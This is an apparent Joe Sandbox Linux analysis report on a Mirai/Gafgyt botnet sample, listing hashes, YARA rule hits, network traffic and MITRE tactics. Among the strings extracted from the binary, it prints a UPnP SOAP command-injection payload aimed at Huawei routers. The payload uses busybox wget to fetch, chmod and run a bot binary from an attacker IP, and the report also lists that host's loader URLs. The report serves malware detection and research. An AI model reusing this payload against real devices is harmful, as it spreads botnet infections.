Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
momo.spc.elf

Overview

General Information

Sample name:momo.spc.elf
Analysis ID:1584467
MD5:f4ba5fae397dfdff2a9427d7b15e7cb9
SHA1:e98ca6734fa61703ae174c657e1cf49df024fe26
SHA256:0a8a58067b462b3197bf1e150c189f0cbf7271f10e5fea0368836ab3eee9d69e
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584467
Start date and time:2025-01-05 15:28:30 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:momo.spc.elf
Detection:MAL
Classification:mal64.troj.linELF@0/0@0/0
Command:/tmp/momo.spc.elf
PID:5439
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
SpasoBuild-BadWolf-MomentumProduc
Standard Error:
  • system is lnxubuntu20
  • momo.spc.elf (PID: 5439, Parent: 5355, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/momo.spc.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
momo.spc.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    momo.spc.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
    • 0x12628:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1263c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12650:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12664:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12678:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1268c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x126a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x126b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x126c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x126dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x126f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12704:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12718:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1272c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12740:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12754:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12768:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x1277c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x12790:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x127a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    • 0x127b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
    SourceRuleDescriptionAuthorStrings
    5439.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5439.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x12628:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1263c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12650:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12664:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12678:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1268c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x126f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12704:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12718:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1272c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12740:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12754:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12768:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1277c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x12790:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x127a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x127b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      5445.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        5445.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x12628:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1263c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12650:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12664:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12678:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1268c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x126a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x126b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x126c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x126dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x126f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12704:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12718:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1272c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12740:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12754:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12768:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1277c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x12790:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x127a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x127b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        Process Memory Space: momo.spc.elf PID: 5439Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x24bd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24d1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24e5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24f9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x250d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2521:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2535:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2549:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x255d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2571:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2585:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2599:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x25ad:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x25c1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x25d5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x25e9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x25fd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2611:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2625:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2639:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x264d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        Click to see the 1 entries
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: momo.spc.elfVirustotal: Detection: 57%Perma Link
        Source: momo.spc.elfReversingLabs: Detection: 60%
        Source: global trafficTCP traffic: 192.168.2.13:44282 -> 1.1.1.1:3778
        Source: /tmp/momo.spc.elf (PID: 5439)Socket: 127.0.0.1:9473Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: momo.spc.elfString found in binary or memory: http://123.253.61.116/fuck/momo.arm7;chmod
        Source: momo.spc.elfString found in binary or memory: http://123.253.61.116/fuck/momo.mips;
        Source: momo.spc.elfString found in binary or memory: http://123.253.61.116/fuick/momo.x86
        Source: momo.spc.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: momo.spc.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443

        System Summary

        barindex
        Source: momo.spc.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5439.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5445.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: momo.spc.elf PID: 5439, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: momo.spc.elf PID: 5445, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 123.253.61.116 -l /tmp/bigH -r /fuck/momo.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: momo.spc.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5439.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5445.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: momo.spc.elf PID: 5439, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: Process Memory Space: momo.spc.elf PID: 5445, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: classification engineClassification label: mal64.troj.linELF@0/0@0/0
        Source: /tmp/momo.spc.elf (PID: 5441)Directory: /tmp/.Jump to behavior
        Source: /tmp/momo.spc.elf (PID: 5441)Directory: /tmp/..Jump to behavior
        Source: /tmp/momo.spc.elf (PID: 5439)Queries kernel information via 'uname': Jump to behavior
        Source: momo.spc.elf, 5439.1.0000558cfaf51000.0000558cfafd6000.rw-.sdmp, momo.spc.elf, 5445.1.0000558cfaf51000.0000558cfafd6000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
        Source: momo.spc.elf, 5439.1.0000558cfaf51000.0000558cfafd6000.rw-.sdmp, momo.spc.elf, 5445.1.0000558cfaf51000.0000558cfafd6000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/sparc
        Source: momo.spc.elf, 5439.1.00007ffd25f13000.00007ffd25f34000.rw-.sdmp, momo.spc.elf, 5445.1.00007ffd25f13000.00007ffd25f34000.rw-.sdmpBinary or memory string: erx86_64/usr/bin/qemu-sparc/tmp/momo.spc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/momo.spc.elf
        Source: momo.spc.elf, 5439.1.00007ffd25f13000.00007ffd25f34000.rw-.sdmp, momo.spc.elf, 5445.1.00007ffd25f13000.00007ffd25f34000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: momo.spc.elf, type: SAMPLE
        Source: Yara matchFile source: 5439.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5445.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: momo.spc.elf, type: SAMPLE
        Source: Yara matchFile source: 5439.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 5445.1.00007f0aa0011000.00007f0aa0027000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
        Hidden Files and Directories
        OS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        SourceDetectionScannerLabelLink
        momo.spc.elf57%VirustotalBrowse
        momo.spc.elf61%ReversingLabsLinux.Trojan.Mirai
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://123.253.61.116/fuck/momo.arm7;chmodmomo.spc.elffalse
          high
          http://123.253.61.116/fuick/momo.x86momo.spc.elffalse
            high
            http://123.253.61.116/fuck/momo.mips;momo.spc.elffalse
              high
              http://schemas.xmlsoap.org/soap/encoding/momo.spc.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/momo.spc.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUSfalse
                  185.125.190.26
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  1.1.1.16fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                  • 1.1.1.1/ctrl/playback.php
                  PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                  • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                  AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                  • 1.1.1.1/
                  INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                  • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                  Go.exeGet hashmaliciousUnknownBrowse
                  • 1.1.1.1/
                  185.125.190.26fuckunix.x86_64.elfGet hashmaliciousMiraiBrowse
                    momo.sh4.elfGet hashmaliciousMiraiBrowse
                      fuckunix.x86.elfGet hashmaliciousMiraiBrowse
                        z0r0.mips.elfGet hashmaliciousUnknownBrowse
                          z0r0.mpsl.elfGet hashmaliciousUnknownBrowse
                            fenty.arm4.elfGet hashmaliciousMiraiBrowse
                              a.elfGet hashmaliciousGafgytBrowse
                                176.119.150.11-i-2025-01-04T15_20_35.elfGet hashmaliciousGafgyt, MiraiBrowse
                                  Space.ppc.elfGet hashmaliciousMiraiBrowse
                                    la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSmomo.ppc.elfGet hashmaliciousMiraiBrowse
                                      • 1.1.1.1
                                      momo.sh4.elfGet hashmaliciousMiraiBrowse
                                      • 1.1.1.1
